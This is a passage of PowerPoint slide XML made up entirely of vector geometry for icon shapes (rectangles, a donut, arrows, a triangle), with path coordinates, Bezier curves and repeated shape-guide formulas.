                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843881" y="3920353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483881" y="3920353"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="757697" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="757697" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="432932" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="432932" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605297" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605297" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168643" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318300" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1127664" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200100" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9464" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168643" y="539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3" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DFCD4A-250D-4565-B9BF-3EB2727DF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579" y="3848133"/>
              <a:ext cx="330939" cy="260933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Donut 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077F0151-42C6-4168-9205-DCA71719D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511" y="4923426"/>
              <a:ext cx="304410" cy="330939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225AE540-4E33-4C43-BCFF-ACE56AD8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8127" y="4821478"/>
              <a:ext cx="257012" cy="330939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Rounded Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08C69BE-22CC-4031-8AD6-A8B0C2C8A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7386" y="3842640"/>
              <a:ext cx="309335" cy="30930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117745" y="2289258"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2253931" y="2373161"/>
                    <a:pt x="2290104" y="2397532"/>
                    <a:pt x="2392952" y="2510010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2551302" y="2699530"/>
                    <a:pt x="2456894" y="2911213"/>
                    <a:pt x="2285214" y="2987744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046443" y="3084914"/>
                    <a:pt x="1864058" y="3073352"/>
                    <a:pt x="1634211" y="2962065"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1390134" y="2803501"/>
                    <a:pt x="1391670" y="2463226"/>
                    <a:pt x="1703848" y="2355742"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1867216" y="2309770"/>
                    <a:pt x="1932946" y="2304275"/>
                    <a:pt x="2117745" y="2289258"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1895201" y="880902"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2049819" y="878570"/>
                    <a:pt x="2210983" y="1023567"/>
                    <a:pt x="2276065" y="1236504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2350446" y="1479859"/>
                    <a:pt x="2271166" y="1719799"/>
                    <a:pt x="2098990" y="1772423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1926813" y="1825048"/>
                    <a:pt x="1726940" y="1670429"/>
                    <a:pt x="1652559" y="1427074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1578180" y="1183717"/>
                    <a:pt x="1657458" y="943778"/>
                    <a:pt x="1829635" y="891153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2577034" y="759541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1972441" y="767241"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1929619" y="768623"/>
                    <a:pt x="1886068" y="773785"/>
                    <a:pt x="1842289" y="783004"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1492048" y="856758"/>
                    <a:pt x="1259862" y="1162246"/>
                    <a:pt x="1323686" y="1465331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1380617" y="1735681"/>
                    <a:pt x="1653838" y="1912801"/>
                    <a:pt x="1960688" y="1894227"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1954787" y="1896039"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1858317" y="2000800"/>
                    <a:pt x="1978682" y="2148499"/>
                    <a:pt x="2028445" y="2210716"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1914361" y="2213518"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1373805" y="2249742"/>
                    <a:pt x="1143478" y="2466102"/>
                    <a:pt x="1177422" y="2809298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1211366" y="3152493"/>
                    <a:pt x="1741992" y="3244646"/>
                    <a:pt x="2060873" y="3229704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2379755" y="3214763"/>
                    <a:pt x="2698110" y="2930571"/>
                    <a:pt x="2719230" y="2648210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2699867" y="2070575"/>
                    <a:pt x="2052418" y="2112562"/>
                    <a:pt x="2282832" y="1799863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2510843" y="1673695"/>
                    <a:pt x="2641919" y="1435236"/>
                    <a:pt x="2592014" y="1198247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2566015" y="1074781"/>
                    <a:pt x="2494906" y="970760"/>
                    <a:pt x="2395028" y="897200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2564389" y="891152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2644558" y="859402"/>
                    <a:pt x="2739013" y="796695"/>
                    <a:pt x="2769176" y="767327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2755484" y="761968"/>
                    <a:pt x="2680847" y="759625"/>
                    <a:pt x="2577034" y="759541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Down Arrow 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1349248-BC3E-4DCD-9051-D2CF537FC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733" y="3025716"/>
              <a:ext cx="257188" cy="377708"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2745756" h="4032448">
                  <a:moveTo>
                    <a:pt x="1622229" y="1008112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="1008112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2745756" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996738" y="4032448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247720" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622229" y="3081405"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="749018" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1498036" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9510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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE07520C-E6FE-4F09-A947-EA6F68046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8297" y="5013963"/>
              <a:ext cx="300437" cy="20934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3A5724F3-C522-4B0D-93EE-ECF44EBFB9F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="678773">
              <a:off x="10108027" y="4569149"/>
              <a:ext cx="338104" cy="343148"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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62894 h 3939732"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1381594 h 3939732"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2033280 h 3939732"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2631017 h 3939732"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 1997628 h 3939732"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1825498 h 3939732"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1362894 h 3939732"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1508593 h 3939732"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2416710 h 3939732"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2417653 h 3939732"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2822329 h 3939732"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2836256 h 3939732"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2835026 h 3939732"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2827425 h 3939732"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2555951 h 3939732"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2549477 h 3939732"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3084844 h 3939732"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2011053 h 3939732"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 959078 h 3939732"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 937262 h 3939732"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1165194 h 3939732"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 869152 h 3939732"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 794408 h 3939732"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2090795 h 3939732"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2032862 h 3939732"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1337965 h 3939732"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1338068 h 3939732"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 566301 h 3939732"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2265435 h 3939732"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3399556 h 3939732"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3063923 h 3939732"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3500815 h 3939732"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3895311 h 3939732"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2371338 h 3939732"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3876965"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3876965"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3876965"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3876965"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3876965"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3876965"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3876965"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3876965"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3876965"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3876965"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3876965"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3876965"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3876965"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3876965"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3876965"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3876965"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3876965"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3876965"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3876965"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3876965"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3876965"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3876965"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3876965"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3876965"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3876965"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3876965"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3876965"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3876965"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3876965"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3876965"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3876965"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3876965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671055 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383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704679 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2448797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164582 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3888568"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3888568"/>
                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3888568"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3888568"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3888568"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3888568"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3888568"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3888568"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3888568"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3888568"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3888568"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3888568"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3888568"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3888568"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3888568"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3888568"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3888568"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3888568"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3888568"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3888568"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3888568"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3888568"/>
                <a:gd name="connsiteY34" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3892469"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3892469"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3892469"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3892469"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3892469"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3892469"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3892469"/>
